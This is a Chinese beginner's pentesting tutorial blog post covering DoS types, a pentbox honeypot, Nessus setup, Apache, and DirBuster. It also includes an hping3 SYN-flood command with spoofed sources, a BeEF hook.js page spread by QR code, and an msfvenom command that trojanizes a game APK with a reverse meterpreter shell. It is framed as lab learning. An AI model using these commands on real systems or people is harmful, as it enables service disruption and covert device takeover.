首页 > 其他分享 >黑客玩具入门——8、其他攻击手段

黑客玩具入门——8、其他攻击手段

时间:2023-12-01 16:56:21浏览次数:51  
标签:拒绝服务 入门 蜜罐 攻击 可以 玩具 DirBuster 黑客 然后

1、拒绝服务攻击

使用某些手段故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。实际上拒绝服务攻击并不是一个攻击方式,它是一类具有相似特征的攻击方式的集合。拒绝服务攻击有以下分类:

1. 数据链路层的拒绝服务攻击

攻击目标:交换机

集线器:以前的内网都是用集线器,集线器不具备“学习”和“记忆”功能,多台机器在通信的时候,都是将信息发给所有的机器,如果不是对应的机器接收到,就不做应答。它的缺点是,我们可以很简单的获取到整个网络内的所有信息。

交换机:交换机有学习和记忆的功能,在交换机内部有一个CAM的表,这个表可以记录交换机每个接口对应的计算机的MAC地址信息,有了这些信息,在传输数据的时候就可以一对一传输。

拒绝服务攻击利用方法:CAM表容量有限,如果我们在短时间内制造大量的不同源的MAC地址发来的数据包,CAM表就会被占满,导致交换机无法正常工作。

2.网络层的拒绝服务攻击

TCP和UDP就位于这一层,而基于TCP的拒绝服务攻击,就是大家常说的拒绝服务攻击。大部分的服务器都是提供HTTP服务的服务器,HTTP协议就是TCP提供的支持。基于TCP的拒绝服务攻击有两种:

  1. 和目标端口完成三次握手,建立一个完整链接
  2. 只和目标端口完成三次握手的前两次,建立一个不完整的链接,这种方式最常用。

利用工具:hping3。实验靶机:Metasploitable2。

命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip]

3.传输层的拒绝服务攻击

4.基于应用层的拒绝服务攻击

5.DDOS攻击

大家常说的DDOS攻击,翻译过来就是分布式拒绝服务攻击,也就是很多的机器同时对目标发起拒绝服务攻击,这就是为什么DDOS往往和肉鸡这个词一起出现的原因。

2、用Kali Linux 蜜罐引诱可能的攻击者进入陷阱

什么是蜜罐?许多安全专家都喜欢的一个东西就是蜜罐。简单地说,蜜罐是模拟特定网络攻击目标的系统。有了蜜罐,管理员可以检测并记录对某些服务发起的网络攻击,以及发起攻击的IP地址。建立一个蜜罐是相当简单的,使用Kali Linux和pentbox组合,可以在几分钟内启动和运行一个蜜罐。

可以使用以下命令下载蜜罐:

wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz

运行pentbox Ruby脚本:

./pentbox.rb

然后会看到一个菜单,在菜单中选择2(用于网络工具),然后选择3(用于蜜罐)。

然后会让你选择快捷设置还是手动设置,如果快捷设置报错了,那么可以使用手动设置,比如端口被占用等。

然后可以用另外一台电脑来访问该kali的ip地址,别忘了加端口号。

然后就没有然后了。

3、Nessus

Nessus是目前全世界最多人使用的系统漏洞扫描和分析工具。

1、安装

  1. 下载地址:https://www.tenable.com/downloads/nessus?loginAttempted=true。
  2. 下载kali linux的版本。注意要在kali的系统里的浏览器里下载哦。

  3. 然后,在你下载的那个文件夹里右键打开终端:

  4. 然后输入:sudo dpkg -i [安装包名]。
  5. 开启服务,命令已经告诉你了。sudo /bin/systemctl start nessusd.service

  6. 打开浏览器,访问上图中的链接地址。然后会出现个提示,就跟Windows访问不安全的地址一样,点灰色的按钮,接受就好了。

  7. 点击下一步,输入邮箱和姓名(随便写好伐)。

  8. 然后回车,然后会发给你一封信,信里有Activation Code,输入Activation Code

  9. 然后会输入用户名和密码。
  10. 然后就会更新软件,就完事了,当然也可能会失败。

2、使用方法

暂不介绍,自行百度。

4、Apache服务的使用方法

Apache是世界使用排名第一的web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

运行一个网站,可以作为文件上传下载的中转站。其实咱们之前都玩过了。

启动apache服务:sudo service apache2 start。

5、扫码控制

实践步骤:

  1. 修改虚拟机的联网模式为桥接模式
  2. 启动beef框架,打开后设置一个你记得住的密码。

  3. 复制网站模板(随便百度静态网站模板,就是静态的html页面)到kali中,把hook.js文件加入到模板的首页中。

     把这段js脚本代码,放到如下图所示即可,注意,看到下面红框里的<IP>没有?改成你的主机IP,就完事了。

  4. 把网站模板复制到Apache目录下:
    • 先把apache目录中原有的文件都删除掉:sudo rm -rf *。
    • 然后把刚才的index.html模板复制到该目录下,之前学过这命令,不说了
  5. 启动apache服务。也说过,再不知道回去看。
  6. 将网站首页的链接制作成二维码。通过草料二维码,把链接地址转换成二维码就可以了。
  7. 登录beef页面,地址在这里:

默认的用户名就是beef,密码就是刚才你设置的:

就进来了。

  1. 用手机扫描二维码。
  2. 然后你就可以在浏览器的beef标签里查看了。

所以!不要轻易扫码!!!

6、在软件中植入Payload

1.首先我下载了一个游戏,你自己随便下载。

2.在app中植入payload。啥意思不说了哈,都知道了。

 

sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk

3.然后开启主控端,进入meterpreter。

4.通过apache把apl发送到你的安卓手机上。

5.安装并打开游戏。

6.然后,做之前学过的事吧!

7、DirBuster目录爆破

要相对一个目标站点做渗透测试,首先要搞清楚的就是目标的目录结构。这个任务可以交给DirBuster来做。DirBuster是一个多线程Java应用程序,可以破解Web应用程序服务器上的目录和文件名。DirBuster自带字典文件,当然我们可以根据收集到的其他信息,针对性的生成更加好用的字典文件。

使用方法,要想使用DirBuster只需要简单的四部操作,实验靶机是owasp linux服务器:

  1. 设置目标网站网址(在kali中搜索DirBuster就能找到了):

     

  2. 设置软件扫码的速度,也就是线程数。默认为10,我们可以根据自己的需求设置,如果目标站点带宽不够且线程数太高,会导致目标站点无法正常访问。拖拽修改即可。

  3. 设置字典文件。字典可以使我们根据已收集到的信息对应生成的字典。也可以是dirbuster默认自带的几个字典。dirbuster自带的字典文件在/usr/share/dirbuster/wordlists/目录下。

  4. 这些不用动,点start就可以了。

  5. 然后,我们可以在下图的tabs中查看各种扫描结果信息

     

标签:拒绝服务,入门,蜜罐,攻击,可以,玩具,DirBuster,黑客,然后
From: https://www.cnblogs.com/zaking/p/17864973.html

相关文章

  • XmlRPC入门_基于C的服务端、客户端
    以下客户端与服务端的代码内容为官网给出的示例,此处拷贝记录,了解基础使用方式。1、服务端#include<iostream>#include<winsock2.h>#include<windows.h>#include"xmlrpc-c/base.h"#include"xmlrpc-c/server.h"#include"xmlrpc-c/server_abyss.h"#incl......
  • Jmeter接口自动化测试 —— Jmeter下载安装及入门
    jmeter简介ApacheJMeter是Apache组织开发的基于Java的压力测试工具。用于对软件做压力测试,它最初被设计用于Web应用测试,但后来扩展到其他测试领域。下载下载地址:ApacheJMeter-DownloadApacheJMeter安装由于Jmeter是基于Java的程序,所以我们要使用Jmeter就必须先安装Ja......
  • 3-1 MySQL 入门-安装配置篇
    ​ 概要以前,在开发程序时,我们会把很多的数据和信息存储到某个文件夹中的文件中,例如:user.txt、db.xlsx等。现在,有那么一个叫:数据库管理系统(DBMS,DatabaseManagementSystem)的软件,可以帮助我们实现对文件夹中的文件进行操作,而我们只要学习DBMS能识别的指令,就能控制它去帮助我......
  • postgresql从入门到精通教程 - 第36讲:postgresql逻辑备份
       PostgreSQL从小白到专家,是从入门逐渐能力提升的一个系列教程,内容包括对PG基础的认知、包括安装使用、包括角色权限、包括维护管理、、等内容,希望对热爱PG、学习PG的同学们有帮助,欢迎持续关注CUUGPG技术大讲堂。 第36讲:PostgreSQL逻辑备份 第36讲:12月02日(周六)19......
  • 黑客玩具入门——6、网络嗅探
    1、网络嗅探:使用TCPDump分析网络数据TCPDump是一款资深网络工作人员必备的工具。TCPDump是一款小巧的纯命令行工具,正是因为它的体积小巧,所以这款工具可以完美的运行在大多数路由器,防火墙以及Linux系统中。而且TCPDump现在有了Windows版本。TCPDump的使用:tcpdump-v-ieht0-v......
  • 个推文档 > 服务端 > C# > 快速入门
    转自:https://docs.getui.com/getui/server/csharp/start/.NETCore版本个推C#SDK支持.NetCore版本,可以到后面的网址去下载的.NetSDK(版本要求>=2.2):(https://dotnet.microsoft.com/download/)下载个推C#Demo, .NETCoredemo 目录结构如下图所示: ......
  • 从零开始的 dbt 入门教程 (dbt-core 基础篇)
    最近一直在处理数据分析和数据建模的事情,所以接触了dbt等数据分析的工具,国内目前对于dbt比较详细的资料不多,所以打算写四道五篇dbt相关的文章,本文属于dbt系列的第一篇,本篇主要阐述dbt一些基本概念,教会你如何配置dbt连接远端数据库,并运行你的第一个数据模型,那么本文开......
  • 黑客玩具入门——5、继续Metasploit
    1、利用FTP漏洞并植入后门实验靶机:Metasploitable2。实践:使用nmap扫描目标靶机nmap-sVxxx.xxx.xxx.xxx(目标ip)生成linux系统后门msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=xxx.xxx.xxx.xxx(主控端ip)LPORT=5555-felf-o/home/xxxx(用户名)/backdoor.elf......
  • Halcon使用入门
      使用WPF并采取MVVM模式MVVM相关      添加引用Halcon:  XAML设计:<Grid><Grid.RowDefinitions><RowDefinitionHeight="0.8*"/><RowDefinitionHeight="0.2*"/></Grid.RowDefinitions><Hal......
  • 面向对象---入门级(最基础的部分)python
    #面向对象---入门#思想或者宗旨:抽象、封装、继承、多态#完成对一个类的创建,(先抽象)(类名一般大写)classStudent:name=""age=""sex=""score=""#访问类里的元素name="李四"Student.name="张三"print(Student.name)print(name)#name=“......